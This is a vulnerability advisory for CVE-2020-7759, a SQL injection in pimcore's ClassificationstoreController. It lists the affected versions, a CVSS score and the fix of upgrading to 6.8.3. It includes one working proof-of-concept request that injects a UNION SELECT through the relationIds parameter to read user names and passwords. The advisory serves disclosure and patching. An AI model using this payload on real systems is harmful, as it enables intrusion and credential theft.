SQL Injection

Affecting pimcore/pimcore package, versions >=6.7.2, <6.8.3

Report new vulnerabilities
Do your applications use this vulnerable package? Test your applications

Overview

pimcore/pimcore is a content & product management framework (CMS/PIM/E-Commerce).

Affected versions of this package are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{"keyId"%3a"''","groupId"%3a"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+"}]

Remediation

Upgrade pimcore/pimcore to version 6.8.3 or higher.

References

CVSS Score

6.5
medium severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    None
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H/E:P/RL:O/RC:C
Credit
Daniele Scanu
CVE
CVE-2020-7759
CWE
CWE-89
Snyk ID
SNYK-PHP-PIMCOREPIMCORE-1017405
Disclosed
14 Oct, 2020
Published
01 Nov, 2020